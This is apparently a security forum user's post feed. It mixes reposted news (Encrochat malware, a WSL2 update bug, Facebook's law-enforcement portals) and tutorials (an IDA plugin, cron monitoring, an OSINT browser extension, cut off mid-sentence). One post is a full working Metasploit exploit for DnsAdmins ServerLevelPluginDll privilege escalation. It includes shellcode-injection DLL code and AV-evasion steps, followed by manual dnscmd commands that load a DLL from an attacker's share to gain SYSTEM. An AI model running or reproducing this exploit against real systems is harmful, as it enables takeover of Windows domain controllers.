Everything posted by Kev
-
A document obtained by Motherboard provides more detail on the malware law enforcement deployed against Encrochat devices. (Image: YouTube)

The malware that French law enforcement deployed en masse onto Encrochat devices, a large encrypted phone network using Android phones, had the capability to harvest "all data stored within the device," and was expected to include chat messages, geolocation data, usernames, passwords, and more, according to a document obtained by Motherboard.

The document adds more specifics around the law enforcement hack and subsequent takedown of Encrochat earlier this year. Organized crime groups across Europe and the rest of the world heavily used the network before its seizure, in many cases to facilitate large-scale drug trafficking. The operation is one of, if not the, largest law enforcement mass hacking operations to date, with investigators obtaining more than a hundred million encrypted messages.

"The NCA has been collaborating with the Gendarmerie on Encrochat for over 18 months, as the servers are hosted in France. The ultimate objective of this collaboration has been to identify and exploit any vulnerability in the service to obtain content," the document reads, referring to both the UK's National Crime Agency and one of the national police forces of France.

As well as the geolocation data, chat messages, and passwords, the law enforcement malware also told infected Encrochat devices to provide a list of WiFi access points near the device, the document reads. "This command from the implant will result in the JIT receiving the MAC address which is the unique number allocated to each Wi-Fi access point and the SSID which is the human readable name given to that access point," the document adds. A JIT is a joint investigation team, made up of various law enforcement bodies.

Encrochat was a company that offered custom-built phones that sent end-to-end encrypted messages to one another.
Encrochat took a base Android device, installed its own software, and physically removed the GPS, microphone, and camera functionality to lock down the devices further. These modifications may have impacted what sort of data the malware was actually able to obtain once deployed. Encrochat phones had a panic-wipe feature, where if a user entered a particular PIN it would erase data stored on the device. The devices also ran two operating systems that sat side by side: one that appeared to be innocuous, and another that contained the users' more sensitive communications.

In a previous email to Motherboard, a representative of Encrochat said the firm is a legitimate company with clients in 140 countries, and that it sets out "to find the best technology on the market to provide a reliable and secure service for any organization or individual that want[s] to secure their information." The firm had tens of thousands of users worldwide and decided to shut itself down after discovering the hack against its network.

Encrochat's customers included a British hitman who assassinated a crime leader and an armed robber, and various violent gangs around Europe, including those who used so-called "torture chambers." Some of the users may have been legitimate, however. Since the shutdown, police across Europe have arrested hundreds of alleged criminals who used the service. Motherboard previously obtained chat logs that prosecutors have presented as evidence against one drug dealer.

Running an encrypted phone company is not typically illegal in and of itself. The U.S. Department of Justice charged Vince Ramos, the CEO of another firm called Phantom Secure, with racketeering conspiracy and other charges after an undercover investigation caught him saying the phones were made for drug trafficking. Phantom Secure started as a legitimate firm before catering more to the criminal market. Ramos was sentenced to nine years in prison in May 2019.
French authorities said at the time of the Encrochat shutdown that they had legal authority to deploy the mass hack, which they described as a "technical tool." Via vice.com
-
-
print("Welcome to", end=' ')
print("RSTforums", end='!')
# Output: Welcome to RSTforums!
-
Studying decompiler internals has never been so easy...

Recently, we blogged about the Hex-Rays microcode that powers the IDA Pro decompiler. We showed how a few days spent hacking on the microcode API could dramatically reduce the cost of certain reverse engineering tasks. But developing for the microcode API can be challenging due to the limited examples to crib from, and the general complexity of working with decompiler internals.

Today, we are publishing a developer-oriented plugin for IDA Pro called Lucid. Lucid is an interactive Hex-Rays microcode explorer that makes it effortless to study the optimizations of the decompilation pipeline. We use it as an aid for developing and debugging microcode-based augmentations.

[Image: Lucid is a Hex-Rays microcode explorer for microcode plugin developers]

Usage

Lucid requires IDA 7.5. It will automatically load for any architecture with a Hex-Rays decompiler present. Simply right-click anywhere in a Pseudocode window and select View microcode to open the Lucid Microcode Explorer.

[Image: Lucid adds a right-click 'View microcode' context menu entry to Hex-Rays Pseudocode windows]

By default, the Microcode Explorer will synchronize with the last active Hex-Rays Pseudocode window. This can be toggled on/off in the 'Settings' groupbox of the explorer window.

'Basically Magic'

Lucid's advantage over the existing microcode explorers is that it is backed by a complete text-to-microcode structure mapping. This means that a cursor position in the rendered microcode text can be used to retrieve the underlying microinstruction, sub-instruction, or sub-operand under the user cursor (and vice versa).

As the chief example, we use these mappings to help the explorer 'project' the user cursor through the layers, maintaining focus on the selected instruction or operand as it flows through the decompilation pipeline:

[Image: Scrolling through the microcode maturity layers while tracking a specific operand]

At the end of the day, the intention is to provide more natural experiences for studying the microcode and developing related tooling. This is just one example of how we might 'get there.'

Sub-instruction Graphs

Lucid was originally created to serve as an interactive platform for lifting late-stage microcode expressions and generalizing them into 'optimization' patterns for the decompiler (think inline call detection/rewriting). While I am not sure I'll find the time/motivation to revisit this area of research, Lucid does include a rudimentary feature (inspired by genmc) to view the sub-instruction tree of a given microinstruction, which is still useful by itself.

[Image: Viewing the sub-instruction tree of a given microinstruction]

You can view these individual trees by right-clicking an instruction and selecting View subtree.

Bits and Bobs

The code for Lucid is available on GitHub, where it has been licensed permissively under the MIT license. As this is the initial release, the codebase is a bit messy, and the README contains a few known issues/bugs at the time of publication. Finally, there is no regular development scheduled for this plugin (outside of maintenance), but I always welcome external contributions, issues, and feature requests.

Conclusion

In this post, we presented a new IDA Pro plugin called Lucid. It is a developer-oriented plugin designed to aid in the research and development of microcode-based plugins/extensions for the Hex-Rays decompiler. Our experience developing for these technologies is second to none.
RET2 is happy to consult in these spaces, providing plugin development services, the addition of custom features to existing works, or other unique opportunities with regard to security tooling. If your organization has a need for this expertise, please feel free to reach out. Source
-
Mom and Dad, lots of strawberry-picking tourists come there and take out money; several times they weren't allowed to leave. Anyway, everything over there is a wreck, according to some friends. On another note, search for images and see roughly how many have been published.
-
^ Can't you hear, Pasarica, that it shook the whole city? They overdid it with the TNT; only a few digits of the serial numbers survived. It could have been a terrorist attack. Haven't you considered that hypothesis?
-
This Metasploit module exploits a feature in the DNS service of Windows Server. Users of the DnsAdmins group can set the ServerLevelPluginDll value using dnscmd.exe to create a registry key at HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ named ServerLevelPluginDll that can be made to point to an arbitrary DLL.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'metasploit/framework/compiler/windows'

class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Services
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'DnsAdmin ServerLevelPluginDll Feature Abuse Privilege Escalation',
        'Description' => %q{
          This module exploits a feature in the DNS service of Windows Server.
          Users of the DnsAdmins group can set the `ServerLevelPluginDll` value
          using dnscmd.exe to create a registry key at
          `HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\` named
          `ServerLevelPluginDll` that can be made to point to an arbitrary DLL.
          After doing so, restarting the service will load the DLL and cause it
          to execute, providing us with SYSTEM privileges. Increasing WfsDelay
          is recommended when using a UNC path.

          Users should note that if the DLLPath variable of this module is set
          to a UNC share that does not exist, the DNS server on the target will
          not be able to restart. Similarly, if a UNC share is not utilized and
          users instead opt to drop a file onto the disk of the target computer,
          and this gets picked up by antivirus after the timeout specified by
          `AVTIMEOUT` expires, it's possible that the `ServerLevelPluginDll`
          value of the `HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\`
          key on the target computer may point to a nonexistent DLL, which will
          also prevent the DNS server from being able to restart. Users are
          advised to refer to the documentation for this module for advice on
          how to resolve this issue should it occur.

          This module has only been tested and confirmed to work on Windows
          Server 2019 Standard Edition; however, it should work against any
          Windows Server version up to and including Windows Server 2019.
        },
        'References' => [
          ['URL', 'https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83'],
          ['URL', 'https://adsecurity.org/?p=4064'],
          ['URL', 'http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html']
        ],
        'DisclosureDate' => 'May 08 2017',
        'License' => MSF_LICENSE,
        'Author' => [
          'Shay Ber', # vulnerability discovery
          'Imran E. Dawoodjee <imran[at]threathounds.com>' # Metasploit module
        ],
        'Platform' => 'win',
        'Targets' => [['Automatic', {}]],
        'SessionTypes' => ['meterpreter'],
        'DefaultOptions' => { 'WfsDelay' => 20, 'EXITFUNC' => 'thread' },
        'Notes' => {
          # The service can go down if AV picks up on the file at a
          # non-optimal time or if the UNC path is typed in wrong.
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS],
          'Reliability' => [REPEATABLE_SESSION]
        }
      )
    )
    register_options(
      [
        OptString.new('DLLNAME', [true, 'DLL name (default: msf.dll)', 'msf.dll']),
        OptString.new('DLLPATH', [true, 'Path to DLL. Can be a UNC path. (default: %TEMP%)', '%TEMP%']),
        OptBool.new('MAKEDLL', [true, 'Just create the DLL, do not exploit.', false]),
        OptInt.new('AVTIMEOUT', [true, 'Time to wait for AV to potentially notice the DLL file we dropped, in seconds.', 60])
      ]
    )
    deregister_options('FILE_CONTENTS')
  end

  def check
    if sysinfo['OS'] =~ /Windows 20(03|08|12|16\+|16)/
      vprint_good('OS seems vulnerable.')
    else
      vprint_error('OS is not vulnerable!')
      return Exploit::CheckCode::Safe
    end

    username = client.sys.config.getuid
    user_sid = client.sys.config.getsid
    hostname = sysinfo['Computer']
    vprint_status("Running check against #{hostname} as user #{username}...")

    srv_info = service_info('DNS')
    if srv_info.nil?
      vprint_error('Unable to enumerate the DNS service!')
      return Exploit::CheckCode::Unknown
    end
    if srv_info && srv_info[:display].empty?
      vprint_error('The DNS service does not exist on this host!')
      return Exploit::CheckCode::Safe
    end

    # for use during permission check
    if srv_info[:dacl].nil?
      vprint_error('Unable to determine permissions on the DNS service!')
      return Exploit::CheckCode::Unknown
    end
    dacl_items = srv_info[:dacl].split('D:')[1].scan(/\((.+?)\)/)
    vprint_good("DNS service found on #{hostname}.")

    # user must be a member of the DnsAdmins group to be able to change ServerLevelPluginDll
    group_membership = get_whoami
    unless group_membership
      vprint_error('Unable to enumerate group membership!')
      return Exploit::CheckCode::Unknown
    end
    unless group_membership.include? 'DnsAdmins'
      vprint_error("User #{username} is not part of the DnsAdmins group!")
      return Exploit::CheckCode::Safe
    end

    # find the DnsAdmins group SID
    dnsadmin_sid = ''
    group_membership.each_line do |line|
      unless line.include? 'DnsAdmins'
        next
      end
      vprint_good("User #{username} is part of the DnsAdmins group.")
      line.split.each do |item|
        unless item.include? 'S-'
          next
        end
        vprint_status("DnsAdmins SID is #{item}")
        dnsadmin_sid = item
        break
      end
      break
    end

    # check if the user or DnsAdmins group has the proper permissions to start/stop the DNS service
    if dacl_items.any? { |dacl_item| dacl_item[0].include? dnsadmin_sid }
      dnsadmin_dacl = dacl_items.select { |dacl_item| dacl_item[0].include? dnsadmin_sid }[0]
      if dnsadmin_dacl.include? 'RPWP'
        vprint_good('Members of the DnsAdmins group can start/stop the DNS service.')
      end
    elsif dacl_items.any? { |dacl_item| dacl_item[0].include? user_sid }
      user_dacl = dacl_items.select { |dacl_item| dacl_item[0].include? user_sid }[0]
      if user_dacl.include? 'RPWP'
        vprint_good("User #{username} can start/stop the DNS service.")
      end
    else
      vprint_error("User #{username} does not have permissions to start/stop the DNS service!")
      return Exploit::CheckCode::Safe
    end

    Exploit::CheckCode::Vulnerable
  end

  def exploit
    # get system architecture
    arch = sysinfo['Architecture']
    if arch != payload_instance.arch.first
      fail_with(Failure::BadConfig, 'Wrong payload architecture!')
    end

    # no exploit, just create the DLL
    if datastore['MAKEDLL'] == true
      # copypasta from lib/msf/core/exploit/fileformat.rb
      # writes the generated DLL to ~/.msf4/local/
      dllname = datastore['DLLNAME']
      full_path = store_local('dll', nil, make_serverlevelplugindll(arch), dllname)
      print_good("#{dllname} stored at #{full_path}")
      return
    end

    # will exploit
    if is_system?
      fail_with(Failure::BadConfig, 'Session is already elevated!')
    end
    unless [CheckCode::Vulnerable].include? check
      fail_with(Failure::NotVulnerable, 'Target is most likely not vulnerable!')
    end

    # if the DNS service is not started, it will throw RPC_S_SERVER_UNAVAILABLE when trying to set ServerLevelPluginDll
    print_status('Checking service state...')
    svc_state = service_status('DNS')
    unless svc_state[:state] == 4
      print_status('DNS service is stopped, starting it...')
      service_start('DNS')
    end

    # the service must be started before proceeding
    total_wait_time = 0
    loop do
      svc_state = service_status('DNS')
      if svc_state[:state] == 4
        sleep 1
        break
      else
        sleep 2
        total_wait_time += 2
        fail_with(Failure::TimeoutExpired, 'Was unable to start the DNS service after 3 minutes of trying...') if total_wait_time >= 90
      end
    end

    # the if block assumes several things:
    # 1. operator has set up their own SMB share (SMB2 is default for most targets), as MSF does not support SMB2 yet
    # 2. operator has generated their own DLL with the correct payload and architecture
    # 3. operator's SMB share is accessible from the target. "Enable insecure guest logons" is "Enabled" on the target or
    #    the target falls back to SMB1
    dllpath = expand_path("#{datastore['DLLPATH']}\\#{datastore['DLLNAME']}").strip
    if datastore['DLLPATH'].start_with?('\\\\')
      # Using session.shell_command_token over cmd_exec() here as @wvu-r7 noticed cmd_exec() was broken under some situations.
      build_num_raw = session.shell_command_token('cmd.exe /c ver')
      build_num = build_num_raw.match(/\d+\.\d+\.\d+\.\d+/)
      if build_num.nil?
        print_error("Couldn't retrieve the target's build number!")
        return
      else
        build_num = build_num_raw.match(/\d+\.\d+\.\d+\.\d+/)[0]
        vprint_status("Target's build number: #{build_num}")
      end
      build_num_gemversion = Gem::Version.new(build_num)
      # If the target is running Windows 10 or Windows Server versions with a
      # build number of 16299 or later, aka v1709 or later, then we need to check
      # if "Enable insecure guest logons" is enabled on the target system as per
      # https://support.microsoft.com/en-us/help/4046019/guest-access-in-smb2-disabled-by-default-in-windows-10-and-windows-ser
      if (build_num_gemversion >= Gem::Version.new('10.0.16299.0'))
        # check if "Enable insecure guest logons" is enabled on the target system
        allow_insecure_guest_auth = registry_getvaldata('HKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanWorkstation\\Parameters', 'AllowInsecureGuestAuth')
        unless allow_insecure_guest_auth == 1
          fail_with(Failure::BadConfig, "'Enable insecure guest logons' is not set to Enabled on the target system!")
        end
      end
      print_status('Using user-provided UNC path.')
    else
      write_file(dllpath, make_serverlevelplugindll(arch))
      print_good("Wrote DLL to #{dllpath}!")
      print_status("Sleeping for #{datastore['AVTIMEOUT']} seconds to ensure the file wasn't caught by any AV...")
      sleep(datastore['AVTIMEOUT'])
      unless file_exist?(dllpath.to_s)
        print_error('Woops looks like the DLL got picked up by AV or somehow got deleted...')
        return
      end
      print_good("Looks like our file wasn't caught by the AV.")
    end

    print_warning('Entering danger section...')
    print_status("Modifying ServerLevelPluginDll to point to #{dllpath}...")
    dnscmd_result = cmd_exec("cmd.exe /c dnscmd \\\\#{sysinfo['Computer']} /config /serverlevelplugindll #{dllpath}").to_s.strip
    unless dnscmd_result.include? 'success'
      fail_with(Failure::UnexpectedReply, dnscmd_result.split("\n")[0])
    end
    print_good(dnscmd_result.split("\n")[0])

    # restart the DNS service
    print_status('Restarting the DNS service...')
    restart_service
  end

  def on_new_session(session)
    if datastore['DLLPATH'].start_with?('\\\\')
      return
    else
      if session.type == 'meterpreter'
        session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')
      end
      vprint_status('Erasing ServerLevelPluginDll registry value...')
      cmd_exec("cmd.exe /c dnscmd \\\\#{sysinfo['Computer']} /config /serverlevelplugindll")
      print_good('Exited danger zone successfully!')
      dllpath = expand_path("#{datastore['DLLPATH']}\\#{datastore['DLLNAME']}").strip
      restart_service('session' => session, 'dllpath' => dllpath)
    end
  end

  def restart_service(opts = {})
    # for deleting the DLL
    if opts['session'] && opts['dllpath']
      session = opts['session']
      dllpath = opts['dllpath']
    end

    service_stop('DNS')
    # see if the service has really been stopped
    total_wait_time = 0
    loop do
      svc_state = service_status('DNS')
      if svc_state[:state] == 1
        sleep 1
        break
      else
        sleep 2
        total_wait_time += 2
        fail_with(Failure::TimeoutExpired, 'Was unable to stop the DNS service after 3 minutes of trying...') if total_wait_time >= 90
      end
    end

    # clean up the dropped DLL
    if session && dllpath && !datastore['DLLPATH'].start_with?('\\\\')
      vprint_status("Removing #{dllpath}...")
      session.fs.file.rm dllpath
    end

    service_start('DNS')
    # see if the service has really been started
    total_wait_time = 0
    loop do
      svc_state = service_status('DNS')
      if svc_state[:state] == 4
        sleep 1
        break
      else
        sleep 2
        total_wait_time += 2
        fail_with(Failure::TimeoutExpired, 'Was unable to start the DNS service after 3 minutes of trying...') if total_wait_time >= 90
      end
    end
  end

  def make_serverlevelplugindll(arch)
    # generate the payload
    payload = generate_payload

    # the C template for the ServerLevelPluginDll DLL
    c_template = %|
      #include <Windows.h>
      #include <stdlib.h>
      #include <String.h>

      BOOL APIENTRY DllMain __attribute__((export))(HMODULE hModule, DWORD dwReason, LPVOID lpReserved)
      {
        switch (dwReason)
        {
          case DLL_PROCESS_ATTACH:
          case DLL_THREAD_ATTACH:
          case DLL_THREAD_DETACH:
          case DLL_PROCESS_DETACH:
            break;
        }
        return TRUE;
      }

      int DnsPluginCleanup __attribute__((export))(void)
      {
        return 0;
      }

      int DnsPluginQuery __attribute__((export))(PVOID a1, PVOID a2, PVOID a3, PVOID a4)
      {
        return 0;
      }

      int DnsPluginInitialize __attribute__((export))(PVOID a1, PVOID a2)
      {
        STARTUPINFO startup_info;
        PROCESS_INFORMATION process_info;
        char throwaway_buffer[8];
        ZeroMemory(&startup_info, sizeof(startup_info));
        startup_info.cb = sizeof(STARTUPINFO);
        startup_info.dwFlags = STARTF_USESHOWWINDOW;
        startup_info.wShowWindow = 0;
        if (CreateProcess(NULL, "C:\\\\Windows\\\\System32\\\\notepad.exe", NULL, NULL, FALSE, 0, NULL, NULL, &startup_info, &process_info))
        {
          HANDLE processHandle;
          HANDLE remoteThread;
          PVOID remoteBuffer;
          unsigned char shellcode[] = "SHELLCODE_PLACEHOLDER";
          processHandle = OpenProcess(0x1F0FFF, FALSE, process_info.dwProcessId);
          remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof shellcode, 0x3000, PAGE_EXECUTE_READWRITE);
          WriteProcessMemory(processHandle, remoteBuffer, shellcode, sizeof shellcode, NULL);
          remoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
          CloseHandle(process_info.hThread);
          CloseHandle(processHandle);
        }
        return 0;
      }
    |
    c_template.gsub!('SHELLCODE_PLACEHOLDER', Rex::Text.to_hex(payload.raw).to_s)

    cpu = nil
    case arch
    when 'x86'
      cpu = Metasm::Ia32.new
    when 'x64'
      cpu = Metasm::X86_64.new
    else
      fail_with(Failure::NoTarget, 'Target arch is not compatible')
    end

    print_status('Building DLL...')
    Metasploit::Framework::Compiler::Windows.compile_c(c_template, :dll, cpu)
  end
end

Source
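For context, the feature abuse this module automates can be reproduced by hand with built-in Windows tools. The host name and DLL path below are hypothetical; the sketch assumes the current user is a member of DnsAdmins:

```bat
:: Point ServerLevelPluginDll at a DLL we control (hypothetical UNC path),
:: then restart the DNS service so it loads the "plugin" as SYSTEM.
dnscmd \\DC01 /config /serverlevelplugindll \\ATTACKER\share\msf.dll
sc.exe \\DC01 stop dns
sc.exe \\DC01 start dns
```

As the module's on_new_session handler does, remember to clear the value afterwards (`dnscmd \\DC01 /config /serverlevelplugindll` with no path), or a dangling entry can prevent the DNS service from restarting.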
-
-
The Windows 10 KB4571756 security update released yesterday is reportedly breaking Microsoft's Windows Subsystem for Linux 2 (WSL2) compatibility layer. This issue prevents Windows 10 2004 users from launching the Windows Terminal with WSL2, with the app crashing and throwing "Element not found" and "Process exited with code 4294967295" errors.

Microsoft has yet to officially acknowledge this issue, but the number of reports from users that the error goes away after the update is uninstalled indicates that the Windows 10 2004 KB4571756 update is the one responsible.

KB4571756 is a security update issued yesterday as part of the September 2020 Patch Tuesday release to address vulnerabilities in multiple Windows components and to deliver a number of improvements and fixes. With yesterday's security updates, Microsoft also addressed two denial of service vulnerabilities (CVE-2020-0890 and CVE-2020-0904) affecting Windows Hyper-V, the company's native hypervisor for creating virtual machines and a component also used by WSL2.

To install KB4571756, you can either check for updates via Windows Update or manually download it from the Microsoft Update Catalog. Admins can also distribute the update to enterprise endpoints using Windows Server Update Services (WSUS). On devices where automatic updates are enabled, KB4571756 will install automatically and you do not have to take any further action.

How to fix: uninstall the KB4571756 update

Microsoft has not yet formally acknowledged the issue: no new support document has been published, and no new known issues have been added to the Windows 10 health dashboard covering this user-reported problem. While an official fix is not yet available, affected Windows 10 users have found that uninstalling KB4571756 restores WSL2 functionality.
Before uninstalling the KB4571756 Cumulative Update, you should know that you will also remove the mitigations for multiple security issues impacting your Windows 10 device. For those experiencing crashes when launching Windows Terminal with WSL2 after installing KB4571756, the only way to resolve them at this time is to manually uninstall the update. Microsoft says in the update's details in the Update Catalog that it can be removed "by selecting View installed updates in the Programs and Features Control Panel."

If you are willing to accept a security downgrade in exchange for functional WSL2, you can follow these steps to uninstall the KB4571756 update:

1. Select the Start button or Windows Desktop Search, type "update history," and select View your Update history.
2. On the Settings/View update history dialog window, select Uninstall Updates.
3. On the Installed Updates dialog window, find and select KB4571756, then click the Uninstall button.
4. Restart your Windows device.

We also have a tutorial on how to uninstall, pause, or block Windows updates if they are causing issues after installing. BleepingComputer has reached out to Microsoft for comment but had not heard back at the time of publication. Source
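As a command-line alternative to the Control Panel steps, Windows ships the wusa utility for removing updates by KB number (run from an elevated prompt; this is a general technique, not specific to the article):

```bat
:: Uninstall KB4571756 without prompts; omit /norestart to reboot immediately.
wusa /uninstall /kb:4571756 /quiet /norestart
```

A restart is still required before WSL2 functionality returns.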
-
Facebook has chosen to review user data requests manually, without screening the email addresses of people who request access to the portals, which are made for law enforcement agents only.

Anyone with an email address can get into the Facebook and WhatsApp law enforcement portals, designed for law enforcement agents to file requests for user data. Getting into the two portals doesn't grant people access to any user information, nor any sensitive information about the company. But the portals are not designed to filter email addresses in any way, leaving the door open for spammers to freely access the portals and send fake requests.

Last week, security researcher Jacob Riggs discovered that he could get access to the two portals with any email address. All he needed to do was enter his email address, submit it to the portals, and then click on a confirmation link he received in his inbox. Once he did that, he could request records using the forms below.

[Image: A screenshot of Facebook's portal for law enforcement agents to request user data. (Image: Jacob Riggs)]
[Image: A screenshot of WhatsApp's portal for law enforcement agents to request user data. (Image: Jacob Riggs)]

Motherboard was able to reproduce Riggs' findings. Riggs reported the issue to Facebook, thinking it was due to a design flaw that needed to be fixed. Facebook, however, told Riggs and Motherboard that this was a feature, not a bug. The spokesperson added that the system does reject some email domains and has other rules to prevent spam. In other words, Facebook prefers to let anyone submit a request and then check that it's real and legal, rather than block them with an automated system or require agents to register. In any case, both Facebook and Instagram's portals include a note to discourage potential spammers, warning them that only "governmental entities authorized to obtain evidence in connection with official legal proceedings" can file requests.
Google's law enforcement portal, for comparison, only allows "verified" law enforcement agents to submit requests for user data, according to the company's site. In fact, Riggs could not get into the Google portal using his personal email address.

Tech companies routinely receive and process legitimate data requests through these portals. In its latest transparency report, which includes data requests for Facebook, Facebook Messenger, Instagram, WhatsApp, and Oculus, and which covers the last six months of 2019, the company revealed that it had received 140,875 requests for user data. Source
-
-
Nobody wants to be notified by email anymore, especially if it's a failed cron job. We have advanced monitoring systems that tell us if something's wrong. In my case I use Grafana, Prometheus, and Node exporter to collect host metrics, visualize them, and send out alerts. Usually, one would set up an exporter to monitor a new piece of software, but for cron there isn't any exporter available. On the other hand, there are a lot of online services to monitor your cron jobs, such as Cronitor.io. But we do not want to add another dependency simply for monitoring cron jobs.

In this tutorial I will elaborate on how I look after cron jobs with Prometheus and Grafana. We are going to configure the textfile collector of the Node exporter, define custom metrics, and visualize them in a Grafana dashboard. I assume that there is a machine running cron jobs. This machine has multiple cron jobs and a configured Node exporter. The Node metrics are scraped by Prometheus and visualized in Grafana.

First, we are going to add a bash script to write custom Node exporter metrics. Copy the script below to the host as /usr/local/bin/write-node-exporter-metric:

#!/bin/bash

# Display Help
Help()
{
  echo
  echo "write-node-exporter-metric"
  echo "##########################"
  echo
  echo "Description: Write node-exporter metric."
  echo "Syntax: write-node-exporter-metric [-n|-c|-v|help]"
  echo "Example: write-node-exporter-metric -n cron_job -c \"Renew certs for proxy01\" -v 0"
  echo "options:"
  echo "  -n     Reference of custom metric type. Defaults to 'cron_job'"
  echo "  -c     Code for metric value."
  echo "  -v     Value of metric."
  echo "  help   Show write-node-exporter-metric help."
  echo
}

# Show help and exit
if [[ $1 == 'help' ]]; then
  Help
  exit
fi

# Process params
while getopts ":n:c:v:" opt; do
  case $opt in
    n) TYPE="$OPTARG"
       ;;
    c) CODE="$OPTARG"
       ;;
    v) VALUE="$OPTARG"
       ;;
    \?) echo "Invalid option -$OPTARG" >&2
        Help
        exit
        ;;
  esac
done

# Fallback to environment vars and default values
: ${TYPE:='cron_job'}
[[ -z "$CODE" ]] && { echo "Parameter -c|code is empty" ; exit 1; }
[[ -z "$VALUE" ]] && { echo "Parameter -v|value is empty" ; exit 1; }

if [ "$TYPE" == "cron_job" ]; then
  echo "Write metric node_cron_job_exit_code for code \"$CODE\"."
  ID=$(echo $CODE | shasum | cut -c1-5)
  cat << EOF >> /var/tmp/node_cron_job_exit_code.$ID.prom.$$
# HELP node_cron_job_exit_code Last exit code of cron job.
# TYPE node_cron_job_exit_code counter
node_cron_job_exit_code{code="$CODE"} $VALUE
EOF
  mv /var/tmp/node_cron_job_exit_code.$ID.prom.$$ /var/tmp/node_cron_job_exit_code.$ID.prom
fi

And make it executable:

chmod +x /usr/local/bin/write-node-exporter-metric

By default this script writes metric text files to /var/tmp. This folder is watched by Node exporter. Set the textfile collector directory flag --collector.textfile.directory for the Node exporter. If you are using Docker to run the exporter, set the following config:

...
volumes:
  - /:/hostfs
command: '--collector.textfile.directory=/hostfs/var/tmp'
...

Let's write a custom metric and see if it is scraped by Prometheus. Run the following on the command line:

write-node-exporter-metric -c 'Renew certs for proxy01' -v 0

Check the metrics interface of the host and search for node_cron_job_exit_code. Use this curl command if you want to stick to the console:

curl --silent --user username:password \
  https://host.example.com/node-exporter/metrics | \
  grep node_cron_job_exit_code

If the value has been exposed, open Grafana and explore the metrics. Create a new panel and use this query:

sum by (instance) (node_cron_job_exit_code)

This query sums all cron job exit codes by instance. If the sum is not zero, something went wrong. Create an alert that triggers if the metric is greater than 0. When setting up cron jobs (crontab -e), from now on you simply have to add the write-metric command at the end of the line.
Here is an example:

45 0 * * 0 /usr/share/certbot/renew-certs; write-node-exporter-metric -c 'Renew certs for proxy' -v $?

No matter if the job succeeds or fails, the exit code is written and forwarded to Prometheus. What do you think? Do you like this solution? Let me know how you monitor cron jobs. Source
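The crontab pattern above can be exercised end to end without cron. The sketch below simulates a failing job, captures its exit code with $?, and publishes it using the same write-then-rename trick as the helper script (the directory and job name are illustrative, and the metric is written here as a gauge):

```shell
#!/bin/sh
# Simulate the crontab pattern: run a job, capture its exit code,
# and publish it as a node_exporter textfile metric.
METRIC_DIR=$(mktemp -d)   # stands in for /var/tmp

EXIT_CODE=0
false || EXIT_CODE=$?     # 'false' stands in for a failing cron job

# Write to a temp file first, then mv into place: the rename is atomic,
# so node_exporter never scrapes a half-written file.
TMP="$METRIC_DIR/node_cron_job_exit_code.prom.$$"
cat << EOF > "$TMP"
# HELP node_cron_job_exit_code Last exit code of cron job.
# TYPE node_cron_job_exit_code gauge
node_cron_job_exit_code{code="nightly backup"} $EXIT_CODE
EOF
mv "$TMP" "$METRIC_DIR/node_cron_job_exit_code.prom"

cat "$METRIC_DIR/node_cron_job_exit_code.prom"
```

The `|| EXIT_CODE=$?` form keeps the snippet safe even under `set -e`, where a bare failing command would abort the script before the code could be recorded.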
-
Web browser extensions are one of the simplest ways to get started using open-source intelligence tools because they're cross-platform. Anyone using Chrome on Linux, macOS, or Windows can use them all the same, and the same goes for Firefox. One desktop browser add-on, in particular, makes OSINT as easy as right-clicking to search for hashes, email addresses, and URLs.

Mitaka, created by Manabu Niseki, works in Google Chrome and Mozilla Firefox. Once installed, it lets you select and inspect certain pieces of text and indicators of compromise (IoC), running them through a variety of different search engines, all with just a few clicks. The tool can help investigators identify malware, determine the credibility of an email address, and see if a URL is associated with anything sketchy, to name just a few things.

Installing Mitaka in Your Browser

If you've ever installed a browser extension before, you know what to do. Even if not, it couldn't be easier. Just visit Mitaka in either the Chrome Web Store or Firefox Add-Ons, hit "Add to Chrome" or "Add to Firefox," then select "Add" to verify.

Mitaka: Chrome Extension | Firefox Add-On

Then, once you've found something of interest on a website or in an email that you're investigating, all you need to do is highlight and right-click it, then look through all of the options Mitaka provides in the contextual menu. On the GitHub page for Mitaka, there are a few examples worth trying out to see how well Mitaka works.

Example 1: Inspecting Email Addresses

Whenever you see an email address that you suspect is malicious, whether it's defanged (obfuscated so it can't be clicked) or clickable, you can highlight it, right-click it, then choose "Mitaka." If it's defanged, which usually means putting [.] where regular periods go to break up the link, Mitaka will rearm it so that any search you perform will still work. In the Mitaka menu, you'll see a variety of tools you can use to inspect and investigate the email address.
There are searches you can perform on Censys, PublicWWW, DomainBigData, DomainWatch, EmailRep, IntelligenceX, OCCPR, RiskIQ, SecurityTrails, ThreatConnect, ThreatCrowd, and ViewDNS. For example, if you want to learn its email reputation, choose "Search this email on EmailRep." From the results, we can see that test@example.com is probably not one we should trust. In fact, we can see from this report that it's been blacklisted and flagged for malicious activity. So, if we were to find or receive an email address that had been flagged this way, we would be able to very quickly determine that it was associated with somebody who was blacklisted for malware, or possibly something like phishing, and that would be an excellent way to identify a risky sender or user. Conversely, let's say we're looking through a breach of different people's passwords, and we want to identify whether or not a real person owns an email address. We can take a properly formed email address, right-click it, select "Mitaka," then use the same EmailRep tool to check. From a report, we can assume that it's probably a real person because the email address has been seen in 27 reputable sources on the internet, including Vimeo, Pinterest, and Aboutme. In the code, we can see all of the information about the different types of high-quality profiles that are linked to the email address, which further legitimizes the account as real. Example 2 Performing Malware Analysis on Files Malware analysis is another exciting tool in Mitaka's arsenal. Let's say that we're on a website, and we have a file that we want to download. We've heard of the tool before, it looks reputable, and the web app seems good. Once we download the file, we can compare the hash to the one listed on the site. If the hash matches, we know we downloaded the file the site's author intended, but how do we know that 